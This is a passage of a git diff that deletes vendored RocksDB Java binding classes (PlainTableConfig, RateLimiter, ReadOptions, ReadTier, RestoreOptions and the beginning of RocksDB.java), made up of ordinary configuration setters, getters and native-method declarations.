--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/PlainTableConfig.java
+++ /dev/null
@@ -1,251 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-package org.rocksdb;
-
-/**
- * The config for plain table sst format.
- *
- * <p>PlainTable is a RocksDB's SST file format optimized for low query
- * latency on pure-memory or really low-latency media.</p>
- *
- * <p>It also support prefix hash feature.</p>
- */
-public class PlainTableConfig extends TableFormatConfig {
-  public static final int VARIABLE_LENGTH = 0;
-  public static final int DEFAULT_BLOOM_BITS_PER_KEY = 10;
-  public static final double DEFAULT_HASH_TABLE_RATIO = 0.75;
-  public static final int DEFAULT_INDEX_SPARSENESS = 16;
-  public static final int DEFAULT_HUGE_TLB_SIZE = 0;
-  public static final EncodingType DEFAULT_ENCODING_TYPE =
-      EncodingType.kPlain;
-  public static final boolean DEFAULT_FULL_SCAN_MODE = false;
-  public static final boolean DEFAULT_STORE_INDEX_IN_FILE
-      = false;
-
-  public PlainTableConfig() {
-    keySize_ = VARIABLE_LENGTH;
-    bloomBitsPerKey_ = DEFAULT_BLOOM_BITS_PER_KEY;
-    hashTableRatio_ = DEFAULT_HASH_TABLE_RATIO;
-    indexSparseness_ = DEFAULT_INDEX_SPARSENESS;
-    hugePageTlbSize_ = DEFAULT_HUGE_TLB_SIZE;
-    encodingType_ = DEFAULT_ENCODING_TYPE;
-    fullScanMode_ = DEFAULT_FULL_SCAN_MODE;
-    storeIndexInFile_ = DEFAULT_STORE_INDEX_IN_FILE;
-  }
-
-  /**
-   * <p>Set the length of the user key. If it is set to be
-   * VARIABLE_LENGTH, then it indicates the user keys are
-   * of variable length.</p>
-   *
-   * <p>Otherwise,all the keys need to have the same length
-   * in byte.</p>
-   *
-   * <p>DEFAULT: VARIABLE_LENGTH</p>
-   *
-   * @param keySize the length of the user key.
-   * @return the reference to the current config.
-   */
-  public PlainTableConfig setKeySize(int keySize) {
-    keySize_ = keySize;
-    return this;
-  }
-
-  /**
-   * @return the specified size of the user key.  If VARIABLE_LENGTH,
-   *     then it indicates variable-length key.
-   */
-  public int keySize() {
-    return keySize_;
-  }
-
-  /**
-   * Set the number of bits per key used by the internal bloom filter
-   * in the plain table sst format.
-   *
-   * @param bitsPerKey the number of bits per key for bloom filer.
-   * @return the reference to the current config.
-   */
-  public PlainTableConfig setBloomBitsPerKey(int bitsPerKey) {
-    bloomBitsPerKey_ = bitsPerKey;
-    return this;
-  }
-
-  /**
-   * @return the number of bits per key used for the bloom filter.
-   */
-  public int bloomBitsPerKey() {
-    return bloomBitsPerKey_;
-  }
-
-  /**
-   * hashTableRatio is the desired utilization of the hash table used
-   * for prefix hashing.  The ideal ratio would be the number of
-   * prefixes / the number of hash buckets.  If this value is set to
-   * zero, then hash table will not be used.
-   *
-   * @param ratio the hash table ratio.
-   * @return the reference to the current config.
-   */
-  public PlainTableConfig setHashTableRatio(double ratio) {
-    hashTableRatio_ = ratio;
-    return this;
-  }
-
-  /**
-   * @return the hash table ratio.
-   */
-  public double hashTableRatio() {
-    return hashTableRatio_;
-  }
-
-  /**
-   * Index sparseness determines the index interval for keys inside the
-   * same prefix.  This number is equal to the maximum number of linear
-   * search required after hash and binary search.  If it's set to 0,
-   * then each key will be indexed.
-   *
-   * @param sparseness the index sparseness.
-   * @return the reference to the current config.
-   */
-  public PlainTableConfig setIndexSparseness(int sparseness) {
-    indexSparseness_ = sparseness;
-    return this;
-  }
-
-  /**
-   * @return the index sparseness.
-   */
-  public long indexSparseness() {
-    return indexSparseness_;
-  }
-
-  /**
-   * <p>huge_page_tlb_size: if &le;0, allocate hash indexes and blooms
-   * from malloc otherwise from huge page TLB.</p>
-   *
-   * <p>The user needs to reserve huge pages for it to be allocated,
-   * like: {@code sysctl -w vm.nr_hugepages=20}</p>
-   *
-   * <p>See linux doc Documentation/vm/hugetlbpage.txt</p>
-   *
-   * @param hugePageTlbSize huge page tlb size
-   * @return the reference to the current config.
-   */
-  public PlainTableConfig setHugePageTlbSize(int hugePageTlbSize) {
-    this.hugePageTlbSize_ = hugePageTlbSize;
-    return this;
-  }
-
-  /**
-   * Returns the value for huge page tlb size
-   *
-   * @return hugePageTlbSize
-   */
-  public int hugePageTlbSize() {
-    return hugePageTlbSize_;
-  }
-
-  /**
-   * Sets the encoding type.
-   *
-   * <p>This setting determines how to encode
-   * the keys. See enum {@link EncodingType} for
-   * the choices.</p>
-   *
-   * <p>The value will determine how to encode keys
-   * when writing to a new SST file. This value will be stored
-   * inside the SST file which will be used when reading from
-   * the file, which makes it possible for users to choose
-   * different encoding type when reopening a DB. Files with
-   * different encoding types can co-exist in the same DB and
-   * can be read.</p>
-   *
-   * @param encodingType {@link org.rocksdb.EncodingType} value.
-   * @return the reference to the current config.
-   */
-  public PlainTableConfig setEncodingType(EncodingType encodingType) {
-    this.encodingType_ = encodingType;
-    return this;
-  }
-
-  /**
-   * Returns the active EncodingType
-   *
-   * @return currently set encoding type
-   */
-  public EncodingType encodingType() {
-    return encodingType_;
-  }
-
-  /**
-   * Set full scan mode, if true the whole file will be read
-   * one record by one without using the index.
-   *
-   * @param fullScanMode boolean value indicating if full
-   *     scan mode shall be enabled.
-   * @return the reference to the current config.
-   */
-  public PlainTableConfig setFullScanMode(boolean fullScanMode) {
-    this.fullScanMode_ = fullScanMode;
-    return this;
-  }
-
-  /**
-   * Return if full scan mode is active
-   * @return boolean value indicating if the full scan mode is
-   *     enabled.
-   */
-  public boolean fullScanMode() {
-    return fullScanMode_;
-  }
-
-  /**
-   * <p>If set to true: compute plain table index and bloom
-   * filter during file building and store it in file.
-   * When reading file, index will be mmaped instead
-   * of doing recomputation.</p>
-   *
-   * @param storeIndexInFile value indicating if index shall
-   *     be stored in a file
-   * @return the reference to the current config.
-   */
-  public PlainTableConfig setStoreIndexInFile(boolean storeIndexInFile) {
-    this.storeIndexInFile_ = storeIndexInFile;
-    return this;
-  }
-
-  /**
-   * Return a boolean value indicating if index shall be stored
-   * in a file.
-   *
-   * @return currently set value for store index in file.
-   */
-  public boolean storeIndexInFile() {
-    return storeIndexInFile_;
-  }
-
-  @Override protected long newTableFactoryHandle() {
-    return newTableFactoryHandle(keySize_, bloomBitsPerKey_,
-        hashTableRatio_, indexSparseness_, hugePageTlbSize_,
-        encodingType_.getValue(), fullScanMode_,
-        storeIndexInFile_);
-  }
-
-  private native long newTableFactoryHandle(
-      int keySize, int bloomBitsPerKey,
-      double hashTableRatio, int indexSparseness,
-      int hugePageTlbSize, byte encodingType,
-      boolean fullScanMode, boolean storeIndexInFile);
-
-  private int keySize_;
-  private int bloomBitsPerKey_;
-  private double hashTableRatio_;
-  private int indexSparseness_;
-  private int hugePageTlbSize_;
-  private EncodingType encodingType_;
-  private boolean fullScanMode_;
-  private boolean storeIndexInFile_;
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RateLimiter.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RateLimiter.java
deleted file mode 100644
index fc23887..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RateLimiter.java
+++ /dev/null
@@ -1,119 +0,0 @@
-// Copyright (c) 2015, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * RateLimiter, which is used to control write rate of flush and
- * compaction.
- *
- * @since 3.10.0
- */
-public class RateLimiter extends RocksObject {
-  private static final long DEFAULT_REFILL_PERIOD_MICROS = (100 * 1000);
-  private static final int DEFAULT_FAIRNESS = 10;
-
-  /**
-   * RateLimiter constructor
-   *
-   * @param rateBytesPerSecond this is the only parameter you want to set
-   *     most of the time. It controls the total write rate of compaction
-   *     and flush in bytes per second. Currently, RocksDB does not enforce
-   *     rate limit for anything other than flush and compaction, e.g. write to WAL.
-   * @param refillPeriodMicros this controls how often tokens are refilled. For example,
-   *     when rate_bytes_per_sec is set to 10MB/s and refill_period_us is set to
-   *     100ms, then 1MB is refilled every 100ms internally. Larger value can lead to
-   *     burstier writes while smaller value introduces more CPU overhead.
-   *     The default should work for most cases.
-   * @param fairness RateLimiter accepts high-pri requests and low-pri requests.
-   *     A low-pri request is usually blocked in favor of hi-pri request. Currently,
-   *     RocksDB assigns low-pri to request from compaction and high-pri to request
-   *     from flush. Low-pri requests can get blocked if flush requests come in
-   *     continuously. This fairness parameter grants low-pri requests permission by
-   *     fairness chance even though high-pri requests exist to avoid starvation.
-   *     You should be good by leaving it at default 10.
-   */
-  public RateLimiter(final long rateBytesPerSecond,
-      final long refillPeriodMicros, final int fairness) {
-    super(newRateLimiterHandle(rateBytesPerSecond,
-        refillPeriodMicros, fairness));
-  }
-
-  /**
-   * RateLimiter constructor
-   *
-   * @param rateBytesPerSecond this is the only parameter you want to set
-   *     most of the time. It controls the total write rate of compaction
-   *     and flush in bytes per second. Currently, RocksDB does not enforce
-   *     rate limit for anything other than flush and compaction, e.g. write to WAL.
-   */
-  public RateLimiter(final long rateBytesPerSecond) {
-    this(rateBytesPerSecond, DEFAULT_REFILL_PERIOD_MICROS, DEFAULT_FAIRNESS);
-  }
-
-  /**
-   * <p>This API allows user to dynamically change rate limiter's bytes per second.
-   * REQUIRED: bytes_per_second &gt; 0</p>
-   *
-   * @param bytesPerSecond bytes per second.
-   */
-  public void setBytesPerSecond(final long bytesPerSecond) {
-    assert(isOwningHandle());
-    setBytesPerSecond(nativeHandle_, bytesPerSecond);
-  }
-
-  /**
-   * <p>Request for token to write bytes. If this request can not be satisfied,
-   * the call is blocked. Caller is responsible to make sure
-   * {@code bytes &lt; GetSingleBurstBytes()}.</p>
-   *
-   * @param bytes requested bytes.
-   */
-  public void request(final long bytes) {
-    assert(isOwningHandle());
-    request(nativeHandle_, bytes);
-  }
-
-  /**
-   * <p>Max bytes can be granted in a single burst.</p>
-   *
-   * @return max bytes can be granted in a single burst.
-   */
-  public long getSingleBurstBytes() {
-    assert(isOwningHandle());
-    return getSingleBurstBytes(nativeHandle_);
-  }
-
-  /**
-   * <p>Total bytes that go though rate limiter.</p>
-   *
-   * @return total bytes that go though rate limiter.
-   */
-  public long getTotalBytesThrough() {
-    assert(isOwningHandle());
-    return getTotalBytesThrough(nativeHandle_);
-  }
-
-  /**
-   * <p>Total # of requests that go though rate limiter.</p>
-   *
-   * @return total # of requests that go though rate limiter.
-   */
-  public long getTotalRequests() {
-    assert(isOwningHandle());
-    return getTotalRequests(nativeHandle_);
-  }
-
-  private static native long newRateLimiterHandle(final long rateBytesPerSecond,
-      final long refillPeriodMicros, final int fairness);
-  @Override protected final native void disposeInternal(final long handle);
-
-  private native void setBytesPerSecond(final long handle,
-      final long bytesPerSecond);
-  private native void request(final long handle, final long bytes);
-  private native long getSingleBurstBytes(final long handle);
-  private native long getTotalBytesThrough(final long handle);
-  private native long getTotalRequests(final long handle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/ReadOptions.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/ReadOptions.java
deleted file mode 100644
index 9d7b999..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/ReadOptions.java
+++ /dev/null
@@ -1,397 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * The class that controls the get behavior.
- *
- * Note that dispose() must be called before an Options instance
- * become out-of-scope to release the allocated memory in c++.
- */
-public class ReadOptions extends RocksObject {
-  public ReadOptions() {
-    super(newReadOptions());
-  }
-
-  /**
-   * If true, all data read from underlying storage will be
-   * verified against corresponding checksums.
-   * Default: true
-   *
-   * @return true if checksum verification is on.
-   */
-  public boolean verifyChecksums() {
-    assert(isOwningHandle());
-    return verifyChecksums(nativeHandle_);
-  }
-
-  /**
-   * If true, all data read from underlying storage will be
-   * verified against corresponding checksums.
-   * Default: true
-   *
-   * @param verifyChecksums if true, then checksum verification
-   *     will be performed on every read.
-   * @return the reference to the current ReadOptions.
-   */
-  public ReadOptions setVerifyChecksums(
-      final boolean verifyChecksums) {
-    assert(isOwningHandle());
-    setVerifyChecksums(nativeHandle_, verifyChecksums);
-    return this;
-  }
-
-  // TODO(yhchiang): this option seems to be block-based table only.
-  //                 move this to a better place?
-  /**
-   * Fill the cache when loading the block-based sst formated db.
-   * Callers may wish to set this field to false for bulk scans.
-   * Default: true
-   *
-   * @return true if the fill-cache behavior is on.
-   */
-  public boolean fillCache() {
-    assert(isOwningHandle());
-    return fillCache(nativeHandle_);
-  }
-
-  /**
-   * Fill the cache when loading the block-based sst formatted db.
-   * Callers may wish to set this field to false for bulk scans.
-   * Default: true
-   *
-   * @param fillCache if true, then fill-cache behavior will be
-   *     performed.
-   * @return the reference to the current ReadOptions.
-   */
-  public ReadOptions setFillCache(final boolean fillCache) {
-    assert(isOwningHandle());
-    setFillCache(nativeHandle_, fillCache);
-    return this;
-  }
-
-  /**
-   * Returns the currently assigned Snapshot instance.
-   *
-   * @return the Snapshot assigned to this instance. If no Snapshot
-   *     is assigned null.
-   */
-  public Snapshot snapshot() {
-    assert(isOwningHandle());
-    long snapshotHandle = snapshot(nativeHandle_);
-    if (snapshotHandle != 0) {
-      return new Snapshot(snapshotHandle);
-    }
-    return null;
-  }
-
-  /**
-   * <p>If "snapshot" is non-nullptr, read as of the supplied snapshot
-   * (which must belong to the DB that is being read and which must
-   * not have been released).  If "snapshot" is nullptr, use an implicit
-   * snapshot of the state at the beginning of this read operation.</p>
-   * <p>Default: null</p>
-   *
-   * @param snapshot {@link Snapshot} instance
-   * @return the reference to the current ReadOptions.
-   */
-  public ReadOptions setSnapshot(final Snapshot snapshot) {
-    assert(isOwningHandle());
-    if (snapshot != null) {
-      setSnapshot(nativeHandle_, snapshot.nativeHandle_);
-    } else {
-      setSnapshot(nativeHandle_, 0l);
-    }
-    return this;
-  }
-
-  /**
-   * Returns the current read tier.
-   *
-   * @return the read tier in use, by default {@link ReadTier#READ_ALL_TIER}
-   */
-  public ReadTier readTier() {
-    assert(isOwningHandle());
-    return ReadTier.getReadTier(readTier(nativeHandle_));
-  }
-
-  /**
-   * Specify if this read request should process data that ALREADY
-   * resides on a particular cache. If the required data is not
-   * found at the specified cache, then {@link RocksDBException} is thrown.
-   *
-   * @param readTier {@link ReadTier} instance
-   * @return the reference to the current ReadOptions.
-   */
-  public ReadOptions setReadTier(final ReadTier readTier) {
-    assert(isOwningHandle());
-    setReadTier(nativeHandle_, readTier.getValue());
-    return this;
-  }
-
-  /**
-   * Specify to create a tailing iterator -- a special iterator that has a
-   * view of the complete database (i.e. it can also be used to read newly
-   * added data) and is optimized for sequential reads. It will return records
-   * that were inserted into the database after the creation of the iterator.
-   * Default: false
-   *
-   * Not supported in {@code ROCKSDB_LITE} mode!
-   *
-   * @return true if tailing iterator is enabled.
-   */
-  public boolean tailing() {
-    assert(isOwningHandle());
-    return tailing(nativeHandle_);
-  }
-
-  /**
-   * Specify to create a tailing iterator -- a special iterator that has a
-   * view of the complete database (i.e. it can also be used to read newly
-   * added data) and is optimized for sequential reads. It will return records
-   * that were inserted into the database after the creation of the iterator.
-   * Default: false
-   * Not supported in ROCKSDB_LITE mode!
-   *
-   * @param tailing if true, then tailing iterator will be enabled.
-   * @return the reference to the current ReadOptions.
-   */
-  public ReadOptions setTailing(final boolean tailing) {
-    assert(isOwningHandle());
-    setTailing(nativeHandle_, tailing);
-    return this;
-  }
-
-  /**
-   * Returns whether managed iterators will be used.
-   *
-   * @return the setting of whether managed iterators will be used, by default false
-   */
-  public boolean managed() {
-    assert(isOwningHandle());
-    return managed(nativeHandle_);
-  }
-
-  /**
-   * Specify to create a managed iterator -- a special iterator that
-   * uses less resources by having the ability to free its underlying
-   * resources on request.
-   *
-   * @param managed if true, then managed iterators will be enabled.
-   * @return the reference to the current ReadOptions.
-   */
-  public ReadOptions setManaged(final boolean managed) {
-    assert(isOwningHandle());
-    setManaged(nativeHandle_, managed);
-    return this;
-  }
-
-  /**
-   * Returns whether a total seek order will be used
-   *
-   * @return the setting of whether a total seek order will be used
-   */
-  public boolean totalOrderSeek() {
-    assert(isOwningHandle());
-    return totalOrderSeek(nativeHandle_);
-  }
-
-  /**
-   * Enable a total order seek regardless of index format (e.g. hash index)
-   * used in the table. Some table format (e.g. plain table) may not support
-   * this option.
-   *
-   * @param totalOrderSeek if true, then total order seek will be enabled.
-   * @return the reference to the current ReadOptions.
-   */
-  public ReadOptions setTotalOrderSeek(final boolean totalOrderSeek) {
-    assert(isOwningHandle());
-    setTotalOrderSeek(nativeHandle_, totalOrderSeek);
-    return this;
-  }
-
-  /**
-   * Returns whether the iterator only iterates over the same prefix as the seek
-   *
-   * @return the setting of whether the iterator only iterates over the same
-   *   prefix as the seek, default is false
-   */
-  public boolean prefixSameAsStart() {
-    assert(isOwningHandle());
-    return prefixSameAsStart(nativeHandle_);
-  }
-
-
-  /**
-   * Enforce that the iterator only iterates over the same prefix as the seek.
-   * This option is effective only for prefix seeks, i.e. prefix_extractor is
-   * non-null for the column family and {@link #totalOrderSeek()} is false.
-   * Unlike iterate_upper_bound, {@link #setPrefixSameAsStart(boolean)} only
-   * works within a prefix but in both directions.
-   *
-   * @param prefixSameAsStart if true, then the iterator only iterates over the
-   *   same prefix as the seek
-   * @return the reference to the current ReadOptions.
-   */
-  public ReadOptions setPrefixSameAsStart(final boolean prefixSameAsStart) {
-    assert(isOwningHandle());
-    setPrefixSameAsStart(nativeHandle_, prefixSameAsStart);
-    return this;
-  }
-
-  /**
-   * Returns whether the blocks loaded by the iterator will be pinned in memory
-   *
-   * @return the setting of whether the blocks loaded by the iterator will be
-   *   pinned in memory
-   */
-  public boolean pinData() {
-    assert(isOwningHandle());
-    return pinData(nativeHandle_);
-  }
-
-  /**
-   * Keep the blocks loaded by the iterator pinned in memory as long as the
-   * iterator is not deleted, If used when reading from tables created with
-   * BlockBasedTableOptions::use_delta_encoding = false,
-   * Iterator's property "rocksdb.iterator.is-key-pinned" is guaranteed to
-   * return 1.
-   *
-   * @param pinData if true, the blocks loaded by the iterator will be pinned
-   * @return the reference to the current ReadOptions.
-   */
-  public ReadOptions setPinData(final boolean pinData) {
-    assert(isOwningHandle());
-    setPinData(nativeHandle_, pinData);
-    return this;
-  }
-
-  /**
-   * If true, when PurgeObsoleteFile is called in CleanupIteratorState, we
-   * schedule a background job in the flush job queue and delete obsolete files
-   * in background.
-   *
-   * Default: false
-   *
-   * @return true when PurgeObsoleteFile is called in CleanupIteratorState
-   */
-  public boolean backgroundPurgeOnIteratorCleanup() {
-    assert(isOwningHandle());
-    return backgroundPurgeOnIteratorCleanup(nativeHandle_);
-  }
-
-  /**
-   * If true, when PurgeObsoleteFile is called in CleanupIteratorState, we
-   * schedule a background job in the flush job queue and delete obsolete files
-   * in background.
-   *
-   * Default: false
-   *
-   * @param backgroundPurgeOnIteratorCleanup true when PurgeObsoleteFile is
-   *     called in CleanupIteratorState
-   * @return the reference to the current ReadOptions.
-   */
-  public ReadOptions setBackgroundPurgeOnIteratorCleanup(
-      final boolean backgroundPurgeOnIteratorCleanup) {
-    assert(isOwningHandle());
-    setBackgroundPurgeOnIteratorCleanup(nativeHandle_,
-        backgroundPurgeOnIteratorCleanup);
-    return this;
-  }
-
-  /**
-   * If non-zero, NewIterator will create a new table reader which
-   * performs reads of the given size. Using a large size (&gt; 2MB) can
-   * improve the performance of forward iteration on spinning disks.
-   *
-   * Default: 0
-   *
-   * @return The readahead size is bytes
-   */
-  public long readaheadSize() {
-    assert(isOwningHandle());
-    return readaheadSize(nativeHandle_);
-  }
-
-  /**
-   * If non-zero, NewIterator will create a new table reader which
-   * performs reads of the given size. Using a large size (&gt; 2MB) can
-   * improve the performance of forward iteration on spinning disks.
-   *
-   * Default: 0
-   *
-   * @param readaheadSize The readahead size is bytes
-   * @return the reference to the current ReadOptions.
-   */
-  public ReadOptions setReadaheadSize(final long readaheadSize) {
-    assert(isOwningHandle());
-    setReadaheadSize(nativeHandle_, readaheadSize);
-    return this;
-  }
-
-  /**
-   * If true, keys deleted using the DeleteRange() API will be visible to
-   * readers until they are naturally deleted during compaction. This improves
-   * read performance in DBs with many range deletions.
-   *
-   * Default: false
-   *
-   * @return true if keys deleted using the DeleteRange() API will be visible
-   */
-  public boolean ignoreRangeDeletions() {
-    assert(isOwningHandle());
-    return ignoreRangeDeletions(nativeHandle_);
-  }
-
-  /**
-   * If true, keys deleted using the DeleteRange() API will be visible to
-   * readers until they are naturally deleted during compaction. This improves
-   * read performance in DBs with many range deletions.
-   *
-   * Default: false
-   *
-   * @param ignoreRangeDeletions true if keys deleted using the DeleteRange()
-   *     API should be visible
-   * @return the reference to the current ReadOptions.
-   */
-  public ReadOptions setIgnoreRangeDeletions(final boolean ignoreRangeDeletions) {
-    assert(isOwningHandle());
-    setIgnoreRangeDeletions(nativeHandle_, ignoreRangeDeletions);
-    return this;
-  }
-
-  private native static long newReadOptions();
-  private native boolean verifyChecksums(long handle);
-  private native void setVerifyChecksums(long handle, boolean verifyChecksums);
-  private native boolean fillCache(long handle);
-  private native void setFillCache(long handle, boolean fillCache);
-  private native long snapshot(long handle);
-  private native void setSnapshot(long handle, long snapshotHandle);
-  private native byte readTier(long handle);
-  private native void setReadTier(long handle, byte readTierValue);
-  private native boolean tailing(long handle);
-  private native void setTailing(long handle, boolean tailing);
-  private native boolean managed(long handle);
-  private native void setManaged(long handle, boolean managed);
-  private native boolean totalOrderSeek(long handle);
-  private native void setTotalOrderSeek(long handle, boolean totalOrderSeek);
-  private native boolean prefixSameAsStart(long handle);
-  private native void setPrefixSameAsStart(long handle, boolean prefixSameAsStart);
-  private native boolean pinData(long handle);
-  private native void setPinData(long handle, boolean pinData);
-  private native boolean backgroundPurgeOnIteratorCleanup(final long handle);
-  private native void setBackgroundPurgeOnIteratorCleanup(final long handle,
-      final boolean backgroundPurgeOnIteratorCleanup);
-  private native long readaheadSize(final long handle);
-  private native void setReadaheadSize(final long handle,
-      final long readaheadSize);
-  private native boolean ignoreRangeDeletions(final long handle);
-  private native void setIgnoreRangeDeletions(final long handle,
-      final boolean ignoreRangeDeletions);
-
-  @Override protected final native void disposeInternal(final long handle);
-
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/ReadTier.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/ReadTier.java
deleted file mode 100644
index 6dc76c5..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/ReadTier.java
+++ /dev/null
@@ -1,48 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * RocksDB {@link ReadOptions} read tiers.
- */
-public enum ReadTier {
-  READ_ALL_TIER((byte)0),
-  BLOCK_CACHE_TIER((byte)1),
-  PERSISTED_TIER((byte)2);
-
-  private final byte value;
-
-  ReadTier(final byte value) {
-    this.value = value;
-  }
-
-  /**
-   * Returns the byte value of the enumerations value
-   *
-   * @return byte representation
-   */
-  public byte getValue() {
-    return value;
-  }
-
-  /**
-   * Get ReadTier by byte value.
-   *
-   * @param value byte representation of ReadTier.
-   *
-   * @return {@link org.rocksdb.ReadTier} instance or null.
-   * @throws java.lang.IllegalArgumentException if an invalid
-   *     value is provided.
-   */
-  public static ReadTier getReadTier(final byte value) {
-    for (final ReadTier readTier : ReadTier.values()) {
-      if (readTier.getValue() == value){
-        return readTier;
-      }
-    }
-    throw new IllegalArgumentException("Illegal value provided for ReadTier.");
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RemoveEmptyValueCompactionFilter.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RemoveEmptyValueCompactionFilter.java
deleted file mode 100644
index 6ee81d8..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RemoveEmptyValueCompactionFilter.java
+++ /dev/null
@@ -1,18 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Just a Java wrapper around EmptyValueCompactionFilter implemented in C++
- */
-public class RemoveEmptyValueCompactionFilter
-    extends AbstractCompactionFilter<Slice> {
-  public RemoveEmptyValueCompactionFilter() {
-    super(createNewRemoveEmptyValueCompactionFilter0());
-  }
-
-  private native static long createNewRemoveEmptyValueCompactionFilter0();
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RestoreOptions.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RestoreOptions.java
deleted file mode 100644
index 94d93fc..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RestoreOptions.java
+++ /dev/null
@@ -1,32 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * RestoreOptions to control the behavior of restore.
- *
- * Note that dispose() must be called before this instance become out-of-scope
- * to release the allocated memory in c++.
- *
- */
-public class RestoreOptions extends RocksObject {
-  /**
-   * Constructor
-   *
-   * @param keepLogFiles If true, restore won't overwrite the existing log files
-   *   in wal_dir. It will also move all log files from archive directory to
-   *   wal_dir. Use this option in combination with
-   *   BackupableDBOptions::backup_log_files = false for persisting in-memory
-   *   databases.
-   *   Default: false
-   */
-  public RestoreOptions(final boolean keepLogFiles) {
-    super(newRestoreOptions(keepLogFiles));
-  }
-
-  private native static long newRestoreOptions(boolean keepLogFiles);
-  @Override protected final native void disposeInternal(final long handle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RocksDB.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RocksDB.java
deleted file mode 100644
index eda0950..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RocksDB.java
+++ /dev/null
@@ -1,2384 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import java.util.*;
-import java.io.IOException;
-import java.util.concurrent.atomic.AtomicInteger;
-import java.util.concurrent.atomic.AtomicReference;
-
-import org.rocksdb.util.Environment;
-
-/**
- * A RocksDB is a persistent ordered map from keys to values.  It is safe for
- * concurrent access from multiple threads without any external synchronization.
- * All methods of this class could potentially throw RocksDBException, which
- * indicates sth wrong at the RocksDB library side and the call failed.
- */
-public class RocksDB extends RocksObject {
-  public static final byte[] DEFAULT_COLUMN_FAMILY = "default".getBytes();
-  public static final int NOT_FOUND = -1;
-
-  private enum LibraryState {
-    NOT_LOADED,
-    LOADING,
-    LOADED
-  }
-
-  private static AtomicReference<LibraryState> libraryLoaded
-      = new AtomicReference<>(LibraryState.NOT_LOADED);
-
-  static {
-    RocksDB.loadLibrary();
-  }
-
-  /**
-   * Loads the necessary library files.
-   * Calling this method twice will have no effect.
-   * By default the method extracts the shared library for loading at
-   * java.io.tmpdir, however, you can override this temporary location by
-   * setting the environment variable ROCKSDB_SHAREDLIB_DIR.
-   */
-  public static void loadLibrary() {
-    if (libraryLoaded.get() == LibraryState.LOADED) {
-      return;
-    }
-
-    if (libraryLoaded.compareAndSet(LibraryState.NOT_LOADED,
-        LibraryState.LOADING)) {
-      final String tmpDir = System.getenv("ROCKSDB_SHAREDLIB_DIR");
-      // loading possibly necessary libraries.
-      for (final CompressionType compressionType : CompressionType.values()) {
-        try {
-          if (compressionType.getLibraryName() != null) {
-            System.loadLibrary(compressionType.getLibraryName());
-          }
-        } catch (UnsatisfiedLinkError e) {
-          // since it may be optional, we ignore its loading failure here.
-        }
-      }
-      try {
-        NativeLibraryLoader.getInstance().loadLibrary(tmpDir);
-      } catch (IOException e) {
-        libraryLoaded.set(LibraryState.NOT_LOADED);
-        throw new RuntimeException("Unable to load the RocksDB shared library"
-            + e);
-      }
-
-      libraryLoaded.set(LibraryState.LOADED);
-      return;
-    }
-
-    while (libraryLoaded.get() == LibraryState.LOADING) {
-      try {
-        Thread.sleep(10);
-      } catch(final InterruptedException e) {
-        //ignore
-      }
-    }
-  }
-
-  /**
-   * Tries to load the necessary library files from the given list of
-   * directories.
-   *
-   * @param paths a list of strings where each describes a directory
-   *     of a library.
-   */
-  public static void loadLibrary(final List<String> paths) {
-    if (libraryLoaded.get() == LibraryState.LOADED) {
-      return;
-    }
-
-    if (libraryLoaded.compareAndSet(LibraryState.NOT_LOADED,
-        LibraryState.LOADING)) {
-      for (final CompressionType compressionType : CompressionType.values()) {
-        if (compressionType.equals(CompressionType.NO_COMPRESSION)) {
-          continue;
-        }
-        for (final String path : paths) {
-          try {
-            System.load(path + "/" + Environment.getSharedLibraryFileName(
-                compressionType.getLibraryName()));
-            break;
-          } catch (UnsatisfiedLinkError e) {
-            // since they are optional, we ignore loading fails.
-          }
-        }
-      }
-      boolean success = false;
-      UnsatisfiedLinkError err = null;
-      for (final String path : paths) {
-        try {
-          System.load(path + "/" +
-              Environment.getJniLibraryFileName("rocksdbjni"));
